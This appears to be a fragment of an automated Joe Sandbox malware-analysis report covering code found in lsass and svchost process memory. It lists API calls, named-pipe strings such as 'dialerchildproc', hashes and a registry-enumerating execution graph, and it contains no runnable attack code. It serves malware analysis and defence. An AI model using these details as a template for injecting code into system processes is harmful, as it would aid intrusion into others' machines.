                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                        • API String ID: 190073905-1786718095
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: f8cd9e1dbe3062c5f4ba020bde542ea39c0e4a61bba442b43b9d51f3a524e4ca
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 0781F4317DC24986FE50EB25D4493D966A3E7B4B8CF284025DA494B7D6FB3BCB468700

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32 ref: 00000213BDCECE37
                        • FlsGetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECE4C
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECE6D
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECE9A
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECEAB
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECEBC
                        • SetLastError.KERNEL32 ref: 00000213BDCECED7
                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF0D
                        • FlsSetValue.KERNEL32(?,?,00000001,00000213BDCEECCC,?,?,?,?,00000213BDCEBF9F,?,?,?,?,?,00000213BDCE7AB0), ref: 00000213BDCECF2C
                          • Part of subcall function 00000213BDCED6CC: HeapAlloc.KERNEL32 ref: 00000213BDCED721
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF54
                          • Part of subcall function 00000213BDCED744: HeapFree.KERNEL32 ref: 00000213BDCED75A
                          • Part of subcall function 00000213BDCED744: GetLastError.KERNEL32 ref: 00000213BDCED764
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF65
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000213BDCF0A6B,?,?,?,00000213BDCF045C,?,?,?,00000213BDCEC84F), ref: 00000213BDCECF76
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Value$ErrorLast$Heap$AllocFree
                        • String ID:
                        • API String ID: 570795689-0
                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction ID: 9cfdffa4e4f0b56bcb752030e4244594aa8fca63efa0d4e671618fb2b64398c0
                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction Fuzzy Hash: 85418DB424928C43FE68E371565E3F962435BB47BCF144738A83A476D7FE3AAB414600

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                        • API String ID: 2171963597-1373409510
                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction ID: 6b7d2558ae4a3ac574cfc8a772d118d668cf07695c60263a9c00d2c5ba11f754
                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction Fuzzy Hash: 2E213D7261864483EF10CB25F44879967A2F799BACF504215EA5906BA8EF3DC349CB04

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction ID: f386ab9bdd8cc4c87b67ff9b5e600b282352f279eca3ceb4b3cc66de4f1deea9
                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction Fuzzy Hash: 87E1AD32648B888AEF60DB65D4883DD77A2F769B8CF100115EE8957B99EF36C391C700

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3013587201-537541572
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                        • String ID: d
                        • API String ID: 3743429067-2564639436
                        APIs
                        • FlsGetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED087
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0A6
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0CE
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0DF
                        • FlsSetValue.KERNEL32(?,?,?,00000213BDCEC7DE,?,?,?,?,?,?,?,?,00000213BDCECF9D,?,?,00000001), ref: 00000213BDCED0F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Value
                        • String ID: 1%$Y%
                        • API String ID: 3702945584-1395475152
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID:
                        • API String ID: 190073905-0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Library$Load$AddressErrorFreeLastProc
                        • String ID: api-ms-
                        • API String ID: 2559590344-2084034818
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                        • String ID: CONOUT$
                        • API String ID: 3230265001-3130406586
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModule
                        • String ID: wr
                        • API String ID: 1092925422-2678910430
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Thread$Current$Context
                        • String ID:
                        • API String ID: 1666949209-0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: dialer
                        • API String ID: 756756679-3528709123
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Value$ErrorLast
                        • String ID:
                        • API String ID: 2506987500-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                        • String ID:
                        • API String ID: 517849248-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                        • String ID:
                        • API String ID: 449555515-0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CombinePath
                        • String ID: \\.\pipe\
                        • API String ID: 3422762182-91387939
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ErrorLast
                        • String ID:
                        • API String ID: 1452528299-0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: _invalid_parameter_noinfo
                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                        • API String ID: 3215553584-4202648911
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CallEncodePointerTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3544855599-2084237596
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: FileWrite$ConsoleErrorLastOutput
                        • String ID:
                        • API String ID: 2718003287-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ConsoleErrorLastMode
                        • String ID:
                        • API String ID: 953036326-0
                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction ID: 0ed097bee9c2838b483cb9f14b03d6e6f10cfa9755ec3a11846def29111419fb
                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction Fuzzy Hash: AF91073270865089FF60DF6594483EDBBA2F764B8CF144109DE4A9B69CEB36C78AC700
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                        • String ID:
                        • API String ID: 2933794660-0
                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction ID: f3e89c732882dc4be1fda66988cc4488258048f9f4970aa2de9805cb3fbce708
                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction Fuzzy Hash: 80111F32754B0589EF00CB60E8593E833A4F76975CF440D25DAAD86798EB79C3988380
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: CallTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3163161869-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: bbb7cdb92cb596dcb0788d693a3b58d75f0e34908b0e226618241f28b02e5c54
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: ED616A32608B888AEB20DF65D4443DD77A2F768B8CF144215EF8917B98EB79D255C700
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction ID: 188ea66b7bcfd0c47726733c40de34c55d45513101da1f913a5e3211a342359a
                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction Fuzzy Hash: A151D4B220C78983EE64DE29A55C3FAA753F3AA74CF440135DD5903B49EA3BE7058780
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: U
                        • API String ID: 442123175-4171548499
                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction ID: 7ca704e4079fb843e18e962332c75f2c7a1687e35e23e5be027c6cd1584b2488
                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction Fuzzy Hash: D841A572319A8082DB20CF25E4483D9B7A1F7A879CF504121EE8D8B798EB3DC645CB40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ExceptionFileHeaderRaise
                        • String ID: csm
                        • API String ID: 2573137834-1018135373
                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction ID: 450ba37ac19791e17a21ad49c035722d0e53f3451afd1a5ee852b307dddf2d54
                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction Fuzzy Hash: AC112B32219B8482EB61CB15E44439977E6F798B9CF584220EE8D07768EF3DC655CB00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: ierarchy Descriptor'$riptor at (
                        • API String ID: 592178966-758928094
                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction ID: f4862c4d9b7376f1182d3b6f5f2b365ac3009e22aec70bc65f16aebbe18ce939
                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction Fuzzy Hash: 4EE08671654B4890DF01CF21E8442D833A5DB68B6CB8891229A5C06315FA38D7EBC300
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: Locator'$riptor at (
                        • API String ID: 592178966-4215709766
                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction ID: 27a04a9311f7d125a749bde97889680f3ba368b48a2d80739b1b772cb5aa5af3
                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction Fuzzy Hash: 6FE08C71A54B4880DF02CF21E8802D873A6EB68B6CF889122DA4C06311FA38D7EAC300
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID:
                        • API String ID: 756756679-0
                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction ID: 02eb1687d551be4925cf3a57e29467bdb8e87c8f6b08593b3f3d5ec8add5e525
                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction Fuzzy Hash: C9118275605B4882EE04DB66A4082A977A2FB99FCCF185024DE4D87765EF3AD652D300
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess
                        • String ID:
                        • API String ID: 1617791916-0
                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction ID: ca62a568da37a1804808f6c472a8f8a8754ce746572dadf88ae12087715b600f
                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction Fuzzy Hash: CCE0393564160486EB04CB62D80838A36E2EB99B0AF04C02489090B355EF7E8699C750

                        Execution Graph

                        Execution Coverage:0.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:81
                        Total number of Limit Nodes:4
                        execution_graph (flattened node/edge dump of the rendered graph, summarised): root 158709d1abc loops on Sleep / SleepEx and compares strings via 158709d1598 (StrCmpIW, StrCmpW); it calls 158709d1628, which takes GetProcessHeap / HeapAlloc (via 158709d1268 and 158709e6168) and then walks nine RegOpenKeyExW / RegCloseKey pairs, enumerating each key through 158709d12bc (RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, lstrlenW, StrCpyW, string compares in 158709d152c) or 158709d104c (RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, RegCloseKey); cleanup goes through 158709d18b4 -> 158709d14a4 -> 158709e6180 (GetProcessHeap, HeapFree). A second root, 158709a273c, calls LoadLibraryA.

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                        • String ID: d
                        • API String ID: 3743429067-2564639436
                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction ID: 406b0553ad116c0cf0cb50d7a38d1fd5da460869398bb6113de0fb484408bd0d
                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction Fuzzy Hash: 99418237218F84D6E760CF21E84439E77A1F389B99F148129DB891B758DF38C586CB00

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
